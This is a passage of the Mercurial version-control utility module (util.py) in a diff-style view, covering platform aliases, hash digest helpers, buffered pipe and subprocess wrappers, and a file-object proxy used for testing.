132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
162 try:
162 try:
163 recvfds = osutil.recvfds
163 recvfds = osutil.recvfds
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166 try:
166 try:
167 setprocname = osutil.setprocname
167 setprocname = osutil.setprocname
168 except AttributeError:
168 except AttributeError:
169 pass
169 pass
170 try:
170 try:
171 unblocksignal = osutil.unblocksignal
171 unblocksignal = osutil.unblocksignal
172 except AttributeError:
172 except AttributeError:
173 pass
173 pass
174
174
175 # Python compatibility
175 # Python compatibility
176
176
177 _notset = object()
177 _notset = object()
178
178
179 def safehasattr(thing, attr):
179 def safehasattr(thing, attr):
180 return getattr(thing, attr, _notset) is not _notset
180 return getattr(thing, attr, _notset) is not _notset
181
181
182 def _rapply(f, xs):
182 def _rapply(f, xs):
183 if xs is None:
183 if xs is None:
184 # assume None means non-value of optional data
184 # assume None means non-value of optional data
185 return xs
185 return xs
186 if isinstance(xs, (list, set, tuple)):
186 if isinstance(xs, (list, set, tuple)):
187 return type(xs)(_rapply(f, x) for x in xs)
187 return type(xs)(_rapply(f, x) for x in xs)
188 if isinstance(xs, dict):
188 if isinstance(xs, dict):
189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 return f(xs)
190 return f(xs)
191
191
192 def rapply(f, xs):
192 def rapply(f, xs):
193 """Apply function recursively to every item preserving the data structure
193 """Apply function recursively to every item preserving the data structure
194
194
195 >>> def f(x):
195 >>> def f(x):
196 ... return 'f(%s)' % x
196 ... return 'f(%s)' % x
197 >>> rapply(f, None) is None
197 >>> rapply(f, None) is None
198 True
198 True
199 >>> rapply(f, 'a')
199 >>> rapply(f, 'a')
200 'f(a)'
200 'f(a)'
201 >>> rapply(f, {'a'}) == {'f(a)'}
201 >>> rapply(f, {'a'}) == {'f(a)'}
202 True
202 True
203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205
205
206 >>> xs = [object()]
206 >>> xs = [object()]
207 >>> rapply(pycompat.identity, xs) is xs
207 >>> rapply(pycompat.identity, xs) is xs
208 True
208 True
209 """
209 """
210 if f is pycompat.identity:
210 if f is pycompat.identity:
211 # fast path mainly for py2
211 # fast path mainly for py2
212 return xs
212 return xs
213 return _rapply(f, xs)
213 return _rapply(f, xs)
214
214
215 def bytesinput(fin, fout, *args, **kwargs):
216 sin, sout = sys.stdin, sys.stdout
217 try:
218 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
219 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
220 finally:
221 sys.stdin, sys.stdout = sin, sout
222
223 def bitsfrom(container):
215 def bitsfrom(container):
224 bits = 0
216 bits = 0
225 for bit in container:
217 for bit in container:
226 bits |= bit
218 bits |= bit
227 return bits
219 return bits
228
220
229 # python 2.6 still have deprecation warning enabled by default. We do not want
221 # python 2.6 still have deprecation warning enabled by default. We do not want
230 # to display anything to standard user so detect if we are running test and
222 # to display anything to standard user so detect if we are running test and
231 # only use python deprecation warning in this case.
223 # only use python deprecation warning in this case.
232 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
233 if _dowarn:
225 if _dowarn:
234 # explicitly unfilter our warning for python 2.7
226 # explicitly unfilter our warning for python 2.7
235 #
227 #
236 # The option of setting PYTHONWARNINGS in the test runner was investigated.
228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
237 # However, module name set through PYTHONWARNINGS was exactly matched, so
229 # However, module name set through PYTHONWARNINGS was exactly matched, so
238 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
230 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
239 # makes the whole PYTHONWARNINGS thing useless for our usecase.
231 # makes the whole PYTHONWARNINGS thing useless for our usecase.
240 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
241 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
242 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
243 if _dowarn and pycompat.ispy3:
235 if _dowarn and pycompat.ispy3:
244 # silence warning emitted by passing user string to re.sub()
236 # silence warning emitted by passing user string to re.sub()
245 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
246 r'mercurial')
238 r'mercurial')
247 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
248 DeprecationWarning, r'mercurial')
240 DeprecationWarning, r'mercurial')
249
241
250 def nouideprecwarn(msg, version, stacklevel=1):
242 def nouideprecwarn(msg, version, stacklevel=1):
251 """Issue an python native deprecation warning
243 """Issue an python native deprecation warning
252
244
253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
245 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 """
246 """
255 if _dowarn:
247 if _dowarn:
256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 " update your code.)") % version
249 " update your code.)") % version
258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259
251
260 DIGESTS = {
252 DIGESTS = {
261 'md5': hashlib.md5,
253 'md5': hashlib.md5,
262 'sha1': hashlib.sha1,
254 'sha1': hashlib.sha1,
263 'sha512': hashlib.sha512,
255 'sha512': hashlib.sha512,
264 }
256 }
265 # List of digest types from strongest to weakest
257 # List of digest types from strongest to weakest
266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267
259
268 for k in DIGESTS_BY_STRENGTH:
260 for k in DIGESTS_BY_STRENGTH:
269 assert k in DIGESTS
261 assert k in DIGESTS
270
262
271 class digester(object):
263 class digester(object):
272 """helper to compute digests.
264 """helper to compute digests.
273
265
274 This helper can be used to compute one or more digests given their name.
266 This helper can be used to compute one or more digests given their name.
275
267
276 >>> d = digester([b'md5', b'sha1'])
268 >>> d = digester([b'md5', b'sha1'])
277 >>> d.update(b'foo')
269 >>> d.update(b'foo')
278 >>> [k for k in sorted(d)]
270 >>> [k for k in sorted(d)]
279 ['md5', 'sha1']
271 ['md5', 'sha1']
280 >>> d[b'md5']
272 >>> d[b'md5']
281 'acbd18db4cc2f85cedef654fccc4a4d8'
273 'acbd18db4cc2f85cedef654fccc4a4d8'
282 >>> d[b'sha1']
274 >>> d[b'sha1']
283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 >>> digester.preferred([b'md5', b'sha1'])
276 >>> digester.preferred([b'md5', b'sha1'])
285 'sha1'
277 'sha1'
286 """
278 """
287
279
288 def __init__(self, digests, s=''):
280 def __init__(self, digests, s=''):
289 self._hashes = {}
281 self._hashes = {}
290 for k in digests:
282 for k in digests:
291 if k not in DIGESTS:
283 if k not in DIGESTS:
292 raise Abort(_('unknown digest type: %s') % k)
284 raise Abort(_('unknown digest type: %s') % k)
293 self._hashes[k] = DIGESTS[k]()
285 self._hashes[k] = DIGESTS[k]()
294 if s:
286 if s:
295 self.update(s)
287 self.update(s)
296
288
297 def update(self, data):
289 def update(self, data):
298 for h in self._hashes.values():
290 for h in self._hashes.values():
299 h.update(data)
291 h.update(data)
300
292
301 def __getitem__(self, key):
293 def __getitem__(self, key):
302 if key not in DIGESTS:
294 if key not in DIGESTS:
303 raise Abort(_('unknown digest type: %s') % k)
295 raise Abort(_('unknown digest type: %s') % k)
304 return nodemod.hex(self._hashes[key].digest())
296 return nodemod.hex(self._hashes[key].digest())
305
297
306 def __iter__(self):
298 def __iter__(self):
307 return iter(self._hashes)
299 return iter(self._hashes)
308
300
309 @staticmethod
301 @staticmethod
310 def preferred(supported):
302 def preferred(supported):
311 """returns the strongest digest type in both supported and DIGESTS."""
303 """returns the strongest digest type in both supported and DIGESTS."""
312
304
313 for k in DIGESTS_BY_STRENGTH:
305 for k in DIGESTS_BY_STRENGTH:
314 if k in supported:
306 if k in supported:
315 return k
307 return k
316 return None
308 return None
317
309
318 class digestchecker(object):
310 class digestchecker(object):
319 """file handle wrapper that additionally checks content against a given
311 """file handle wrapper that additionally checks content against a given
320 size and digests.
312 size and digests.
321
313
322 d = digestchecker(fh, size, {'md5': '...'})
314 d = digestchecker(fh, size, {'md5': '...'})
323
315
324 When multiple digests are given, all of them are validated.
316 When multiple digests are given, all of them are validated.
325 """
317 """
326
318
327 def __init__(self, fh, size, digests):
319 def __init__(self, fh, size, digests):
328 self._fh = fh
320 self._fh = fh
329 self._size = size
321 self._size = size
330 self._got = 0
322 self._got = 0
331 self._digests = dict(digests)
323 self._digests = dict(digests)
332 self._digester = digester(self._digests.keys())
324 self._digester = digester(self._digests.keys())
333
325
334 def read(self, length=-1):
326 def read(self, length=-1):
335 content = self._fh.read(length)
327 content = self._fh.read(length)
336 self._digester.update(content)
328 self._digester.update(content)
337 self._got += len(content)
329 self._got += len(content)
338 return content
330 return content
339
331
340 def validate(self):
332 def validate(self):
341 if self._size != self._got:
333 if self._size != self._got:
342 raise Abort(_('size mismatch: expected %d, got %d') %
334 raise Abort(_('size mismatch: expected %d, got %d') %
343 (self._size, self._got))
335 (self._size, self._got))
344 for k, v in self._digests.items():
336 for k, v in self._digests.items():
345 if v != self._digester[k]:
337 if v != self._digester[k]:
346 # i18n: first parameter is a digest name
338 # i18n: first parameter is a digest name
347 raise Abort(_('%s mismatch: expected %s, got %s') %
339 raise Abort(_('%s mismatch: expected %s, got %s') %
348 (k, v, self._digester[k]))
340 (k, v, self._digester[k]))
349
341
350 try:
342 try:
351 buffer = buffer
343 buffer = buffer
352 except NameError:
344 except NameError:
353 def buffer(sliceable, offset=0, length=None):
345 def buffer(sliceable, offset=0, length=None):
354 if length is not None:
346 if length is not None:
355 return memoryview(sliceable)[offset:offset + length]
347 return memoryview(sliceable)[offset:offset + length]
356 return memoryview(sliceable)[offset:]
348 return memoryview(sliceable)[offset:]
357
349
358 closefds = pycompat.isposix
350 closefds = pycompat.isposix
359
351
360 _chunksize = 4096
352 _chunksize = 4096
361
353
362 class bufferedinputpipe(object):
354 class bufferedinputpipe(object):
363 """a manually buffered input pipe
355 """a manually buffered input pipe
364
356
365 Python will not let us use buffered IO and lazy reading with 'polling' at
357 Python will not let us use buffered IO and lazy reading with 'polling' at
366 the same time. We cannot probe the buffer state and select will not detect
358 the same time. We cannot probe the buffer state and select will not detect
367 that data are ready to read if they are already buffered.
359 that data are ready to read if they are already buffered.
368
360
369 This class let us work around that by implementing its own buffering
361 This class let us work around that by implementing its own buffering
370 (allowing efficient readline) while offering a way to know if the buffer is
362 (allowing efficient readline) while offering a way to know if the buffer is
371 empty from the output (allowing collaboration of the buffer with polling).
363 empty from the output (allowing collaboration of the buffer with polling).
372
364
373 This class lives in the 'util' module because it makes use of the 'os'
365 This class lives in the 'util' module because it makes use of the 'os'
374 module from the python stdlib.
366 module from the python stdlib.
375 """
367 """
376 def __new__(cls, fh):
368 def __new__(cls, fh):
377 # If we receive a fileobjectproxy, we need to use a variation of this
369 # If we receive a fileobjectproxy, we need to use a variation of this
378 # class that notifies observers about activity.
370 # class that notifies observers about activity.
379 if isinstance(fh, fileobjectproxy):
371 if isinstance(fh, fileobjectproxy):
380 cls = observedbufferedinputpipe
372 cls = observedbufferedinputpipe
381
373
382 return super(bufferedinputpipe, cls).__new__(cls)
374 return super(bufferedinputpipe, cls).__new__(cls)
383
375
384 def __init__(self, input):
376 def __init__(self, input):
385 self._input = input
377 self._input = input
386 self._buffer = []
378 self._buffer = []
387 self._eof = False
379 self._eof = False
388 self._lenbuf = 0
380 self._lenbuf = 0
389
381
390 @property
382 @property
391 def hasbuffer(self):
383 def hasbuffer(self):
392 """True is any data is currently buffered
384 """True is any data is currently buffered
393
385
394 This will be used externally a pre-step for polling IO. If there is
386 This will be used externally a pre-step for polling IO. If there is
395 already data then no polling should be set in place."""
387 already data then no polling should be set in place."""
396 return bool(self._buffer)
388 return bool(self._buffer)
397
389
398 @property
390 @property
399 def closed(self):
391 def closed(self):
400 return self._input.closed
392 return self._input.closed
401
393
402 def fileno(self):
394 def fileno(self):
403 return self._input.fileno()
395 return self._input.fileno()
404
396
405 def close(self):
397 def close(self):
406 return self._input.close()
398 return self._input.close()
407
399
408 def read(self, size):
400 def read(self, size):
409 while (not self._eof) and (self._lenbuf < size):
401 while (not self._eof) and (self._lenbuf < size):
410 self._fillbuffer()
402 self._fillbuffer()
411 return self._frombuffer(size)
403 return self._frombuffer(size)
412
404
413 def readline(self, *args, **kwargs):
405 def readline(self, *args, **kwargs):
414 if 1 < len(self._buffer):
406 if 1 < len(self._buffer):
415 # this should not happen because both read and readline end with a
407 # this should not happen because both read and readline end with a
416 # _frombuffer call that collapse it.
408 # _frombuffer call that collapse it.
417 self._buffer = [''.join(self._buffer)]
409 self._buffer = [''.join(self._buffer)]
418 self._lenbuf = len(self._buffer[0])
410 self._lenbuf = len(self._buffer[0])
419 lfi = -1
411 lfi = -1
420 if self._buffer:
412 if self._buffer:
421 lfi = self._buffer[-1].find('\n')
413 lfi = self._buffer[-1].find('\n')
422 while (not self._eof) and lfi < 0:
414 while (not self._eof) and lfi < 0:
423 self._fillbuffer()
415 self._fillbuffer()
424 if self._buffer:
416 if self._buffer:
425 lfi = self._buffer[-1].find('\n')
417 lfi = self._buffer[-1].find('\n')
426 size = lfi + 1
418 size = lfi + 1
427 if lfi < 0: # end of file
419 if lfi < 0: # end of file
428 size = self._lenbuf
420 size = self._lenbuf
429 elif 1 < len(self._buffer):
421 elif 1 < len(self._buffer):
430 # we need to take previous chunks into account
422 # we need to take previous chunks into account
431 size += self._lenbuf - len(self._buffer[-1])
423 size += self._lenbuf - len(self._buffer[-1])
432 return self._frombuffer(size)
424 return self._frombuffer(size)
433
425
434 def _frombuffer(self, size):
426 def _frombuffer(self, size):
435 """return at most 'size' data from the buffer
427 """return at most 'size' data from the buffer
436
428
437 The data are removed from the buffer."""
429 The data are removed from the buffer."""
438 if size == 0 or not self._buffer:
430 if size == 0 or not self._buffer:
439 return ''
431 return ''
440 buf = self._buffer[0]
432 buf = self._buffer[0]
441 if 1 < len(self._buffer):
433 if 1 < len(self._buffer):
442 buf = ''.join(self._buffer)
434 buf = ''.join(self._buffer)
443
435
444 data = buf[:size]
436 data = buf[:size]
445 buf = buf[len(data):]
437 buf = buf[len(data):]
446 if buf:
438 if buf:
447 self._buffer = [buf]
439 self._buffer = [buf]
448 self._lenbuf = len(buf)
440 self._lenbuf = len(buf)
449 else:
441 else:
450 self._buffer = []
442 self._buffer = []
451 self._lenbuf = 0
443 self._lenbuf = 0
452 return data
444 return data
453
445
454 def _fillbuffer(self):
446 def _fillbuffer(self):
455 """read data to the buffer"""
447 """read data to the buffer"""
456 data = os.read(self._input.fileno(), _chunksize)
448 data = os.read(self._input.fileno(), _chunksize)
457 if not data:
449 if not data:
458 self._eof = True
450 self._eof = True
459 else:
451 else:
460 self._lenbuf += len(data)
452 self._lenbuf += len(data)
461 self._buffer.append(data)
453 self._buffer.append(data)
462
454
463 return data
455 return data
464
456
465 def mmapread(fp):
457 def mmapread(fp):
466 try:
458 try:
467 fd = getattr(fp, 'fileno', lambda: fp)()
459 fd = getattr(fp, 'fileno', lambda: fp)()
468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
469 except ValueError:
461 except ValueError:
470 # Empty files cannot be mmapped, but mmapread should still work. Check
462 # Empty files cannot be mmapped, but mmapread should still work. Check
471 # if the file is empty, and if so, return an empty buffer.
463 # if the file is empty, and if so, return an empty buffer.
472 if os.fstat(fd).st_size == 0:
464 if os.fstat(fd).st_size == 0:
473 return ''
465 return ''
474 raise
466 raise
475
467
476 def popen2(cmd, env=None, newlines=False):
468 def popen2(cmd, env=None, newlines=False):
477 # Setting bufsize to -1 lets the system decide the buffer size.
469 # Setting bufsize to -1 lets the system decide the buffer size.
478 # The default for bufsize is 0, meaning unbuffered. This leads to
470 # The default for bufsize is 0, meaning unbuffered. This leads to
479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
481 close_fds=closefds,
473 close_fds=closefds,
482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
483 universal_newlines=newlines,
475 universal_newlines=newlines,
484 env=env)
476 env=env)
485 return p.stdin, p.stdout
477 return p.stdin, p.stdout
486
478
487 def popen3(cmd, env=None, newlines=False):
479 def popen3(cmd, env=None, newlines=False):
488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
489 return stdin, stdout, stderr
481 return stdin, stdout, stderr
490
482
491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
493 close_fds=closefds,
485 close_fds=closefds,
494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
495 stderr=subprocess.PIPE,
487 stderr=subprocess.PIPE,
496 universal_newlines=newlines,
488 universal_newlines=newlines,
497 env=env)
489 env=env)
498 return p.stdin, p.stdout, p.stderr, p
490 return p.stdin, p.stdout, p.stderr, p
499
491
500 class fileobjectproxy(object):
492 class fileobjectproxy(object):
501 """A proxy around file objects that tells a watcher when events occur.
493 """A proxy around file objects that tells a watcher when events occur.
502
494
503 This type is intended to only be used for testing purposes. Think hard
495 This type is intended to only be used for testing purposes. Think hard
504 before using it in important code.
496 before using it in important code.
505 """
497 """
506 __slots__ = (
498 __slots__ = (
507 r'_orig',
499 r'_orig',
508 r'_observer',
500 r'_observer',
509 )
501 )
510
502
511 def __init__(self, fh, observer):
503 def __init__(self, fh, observer):
512 object.__setattr__(self, r'_orig', fh)
504 object.__setattr__(self, r'_orig', fh)
513 object.__setattr__(self, r'_observer', observer)
505 object.__setattr__(self, r'_observer', observer)
514
506
515 def __getattribute__(self, name):
507 def __getattribute__(self, name):
516 ours = {
508 ours = {
517 r'_observer',
509 r'_observer',
518
510
519 # IOBase
511 # IOBase
520 r'close',
512 r'close',
521 # closed if a property
513 # closed if a property
522 r'fileno',
514 r'fileno',
523 r'flush',
515 r'flush',
524 r'isatty',
516 r'isatty',
525 r'readable',
517 r'readable',
526 r'readline',
518 r'readline',
527 r'readlines',
519 r'readlines',
528 r'seek',
520 r'seek',
529 r'seekable',
521 r'seekable',
530 r'tell',
522 r'tell',
531 r'truncate',
523 r'truncate',
532 r'writable',
524 r'writable',
533 r'writelines',
525 r'writelines',
534 # RawIOBase
526 # RawIOBase
535 r'read',
527 r'read',
536 r'readall',
528 r'readall',
537 r'readinto',
529 r'readinto',
538 r'write',
530 r'write',
539 # BufferedIOBase
531 # BufferedIOBase
540 # raw is a property
532 # raw is a property
541 r'detach',
533 r'detach',
542 # read defined above
534 # read defined above
543 r'read1',
535 r'read1',
544 # readinto defined above
536 # readinto defined above
545 # write defined above
537 # write defined above
546 }
538 }
547
539
548 # We only observe some methods.
540 # We only observe some methods.
549 if name in ours:
541 if name in ours:
550 return object.__getattribute__(self, name)
542 return object.__getattribute__(self, name)
551
543
552 return getattr(object.__getattribute__(self, r'_orig'), name)
544 return getattr(object.__getattribute__(self, r'_orig'), name)
553
545
554 def __delattr__(self, name):
546 def __delattr__(self, name):
555 return delattr(object.__getattribute__(self, r'_orig'), name)
547 return delattr(object.__getattribute__(self, r'_orig'), name)
556
548
557 def __setattr__(self, name, value):
549 def __setattr__(self, name, value):
558 return setattr(object.__getattribute__(self, r'_orig'), name, value)
550 return setattr(object.__getattribute__(self, r'_orig'), name, value)
559
551
560 def __iter__(self):
552 def __iter__(self):
561 return object.__getattribute__(self, r'_orig').__iter__()
553 return object.__getattribute__(self, r'_orig').__iter__()
562
554
563 def _observedcall(self, name, *args, **kwargs):
555 def _observedcall(self, name, *args, **kwargs):
564 # Call the original object.
556 # Call the original object.
565 orig = object.__getattribute__(self, r'_orig')
557 orig = object.__getattribute__(self, r'_orig')
566 res = getattr(orig, name)(*args, **kwargs)
558 res = getattr(orig, name)(*args, **kwargs)
567
559
568 # Call a method on the observer of the same name with arguments
560 # Call a method on the observer of the same name with arguments
569 # so it can react, log, etc.
561 # so it can react, log, etc.
570 observer = object.__getattribute__(self, r'_observer')
562 observer = object.__getattribute__(self, r'_observer')
571 fn = getattr(observer, name, None)
563 fn = getattr(observer, name, None)
572 if fn:
564 if fn:
573 fn(res, *args, **kwargs)
565 fn(res, *args, **kwargs)
574
566
575 return res
567 return res
576
568
577 def close(self, *args, **kwargs):
569 def close(self, *args, **kwargs):
578 return object.__getattribute__(self, r'_observedcall')(
570 return object.__getattribute__(self, r'_observedcall')(
579 r'close', *args, **kwargs)
571 r'close', *args, **kwargs)
580
572
581 def fileno(self, *args, **kwargs):
573 def fileno(self, *args, **kwargs):
582 return object.__getattribute__(self, r'_observedcall')(
574 return object.__getattribute__(self, r'_observedcall')(
583 r'fileno', *args, **kwargs)
575 r'fileno', *args, **kwargs)
584
576
585 def flush(self, *args, **kwargs):
577 def flush(self, *args, **kwargs):
586 return object.__getattribute__(self, r'_observedcall')(
578 return object.__getattribute__(self, r'_observedcall')(
587 r'flush', *args, **kwargs)
579 r'flush', *args, **kwargs)
588
580
589 def isatty(self, *args, **kwargs):
581 def isatty(self, *args, **kwargs):
590 return object.__getattribute__(self, r'_observedcall')(
582 return object.__getattribute__(self, r'_observedcall')(
591 r'isatty', *args, **kwargs)
583 r'isatty', *args, **kwargs)
592
584
593 def readable(self, *args, **kwargs):
585 def readable(self, *args, **kwargs):
594 return object.__getattribute__(self, r'_observedcall')(
586 return object.__getattribute__(self, r'_observedcall')(
595 r'readable', *args, **kwargs)
587 r'readable', *args, **kwargs)
596
588
597 def readline(self, *args, **kwargs):
589 def readline(self, *args, **kwargs):
598 return object.__getattribute__(self, r'_observedcall')(
590 return object.__getattribute__(self, r'_observedcall')(
599 r'readline', *args, **kwargs)
591 r'readline', *args, **kwargs)
600
592
601 def readlines(self, *args, **kwargs):
593 def readlines(self, *args, **kwargs):
602 return object.__getattribute__(self, r'_observedcall')(
594 return object.__getattribute__(self, r'_observedcall')(
603 r'readlines', *args, **kwargs)
595 r'readlines', *args, **kwargs)
604
596
605 def seek(self, *args, **kwargs):
597 def seek(self, *args, **kwargs):
606 return object.__getattribute__(self, r'_observedcall')(
598 return object.__getattribute__(self, r'_observedcall')(
607 r'seek', *args, **kwargs)
599 r'seek', *args, **kwargs)
608
600
609 def seekable(self, *args, **kwargs):
601 def seekable(self, *args, **kwargs):
610 return object.__getattribute__(self, r'_observedcall')(
602 return object.__getattribute__(self, r'_observedcall')(
611 r'seekable', *args, **kwargs)
603 r'seekable', *args, **kwargs)
612
604
613 def tell(self, *args, **kwargs):
605 def tell(self, *args, **kwargs):
614 return object.__getattribute__(self, r'_observedcall')(
606 return object.__getattribute__(self, r'_observedcall')(
615 r'tell', *args, **kwargs)
607 r'tell', *args, **kwargs)
616
608
617 def truncate(self, *args, **kwargs):
609 def truncate(self, *args, **kwargs):
618 return object.__getattribute__(self, r'_observedcall')(
610 return object.__getattribute__(self, r'_observedcall')(
619 r'truncate', *args, **kwargs)
611 r'truncate', *args, **kwargs)
620
612
621 def writable(self, *args, **kwargs):
613 def writable(self, *args, **kwargs):
622 return object.__getattribute__(self, r'_observedcall')(
614 return object.__getattribute__(self, r'_observedcall')(
623 r'writable', *args, **kwargs)
615 r'writable', *args, **kwargs)
624
616
625 def writelines(self, *args, **kwargs):
617 def writelines(self, *args, **kwargs):
626 return object.__getattribute__(self, r'_observedcall')(
618 return object.__getattribute__(self, r'_observedcall')(
627 r'writelines', *args, **kwargs)
619 r'writelines', *args, **kwargs)
628
620
629 def read(self, *args, **kwargs):
621 def read(self, *args, **kwargs):
630 return object.__getattribute__(self, r'_observedcall')(
622 return object.__getattribute__(self, r'_observedcall')(
631 r'read', *args, **kwargs)
623 r'read', *args, **kwargs)
632
624
633 def readall(self, *args, **kwargs):
625 def readall(self, *args, **kwargs):
634 return object.__getattribute__(self, r'_observedcall')(
626 return object.__getattribute__(self, r'_observedcall')(
635 r'readall', *args, **kwargs)
627 r'readall', *args, **kwargs)
636
628
637 def readinto(self, *args, **kwargs):
629 def readinto(self, *args, **kwargs):
638 return object.__getattribute__(self, r'_observedcall')(
630 return object.__getattribute__(self, r'_observedcall')(
639 r'readinto', *args, **kwargs)
631 r'readinto', *args, **kwargs)
640
632
641 def write(self, *args, **kwargs):
633 def write(self, *args, **kwargs):
642 return object.__getattribute__(self, r'_observedcall')(
634 return object.__getattribute__(self, r'_observedcall')(
643 r'write', *args, **kwargs)
635 r'write', *args, **kwargs)
644
636
645 def detach(self, *args, **kwargs):
637 def detach(self, *args, **kwargs):
646 return object.__getattribute__(self, r'_observedcall')(
638 return object.__getattribute__(self, r'_observedcall')(
647 r'detach', *args, **kwargs)
639 r'detach', *args, **kwargs)
648
640
649 def read1(self, *args, **kwargs):
641 def read1(self, *args, **kwargs):
650 return object.__getattribute__(self, r'_observedcall')(
642 return object.__getattribute__(self, r'_observedcall')(
651 r'read1', *args, **kwargs)
643 r'read1', *args, **kwargs)
652
644
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        data = super(observedbufferedinputpipe, self)._fillbuffer()

        # The low-level os.read() bypasses the proxy, so report it
        # directly to the observer attached to the input pipe.
        hook = getattr(self._input._observer, r'osread', None)
        if hook:
            hook(data, _chunksize)

        return data

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        data = super(observedbufferedinputpipe, self).read(size)

        hook = getattr(self._input._observer, r'bufferedread', None)
        if hook:
            hook(data, size)

        return data

    def readline(self, *args, **kwargs):
        data = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        hook = getattr(self._input._observer, r'bufferedreadline', None)
        if hook:
            hook(data)

        return data
692
684
# Generic escape: every byte maps to its \xNN form by default...
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
# ...but a handful of bytes get friendlier, conventional escapes.
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Bytes that need escaping: control chars (except \t), backslash, non-ASCII.
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')

def escapedata(s):
    """Return ``s`` with unprintable/special bytes escaped for logging."""
    # Normalize to immutable bytes so the escape-map lookup (which uses
    # bytes keys) matches.
    if isinstance(s, bytearray):
        s = bytes(s)

    return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
706
698
class fileobjectobserver(object):
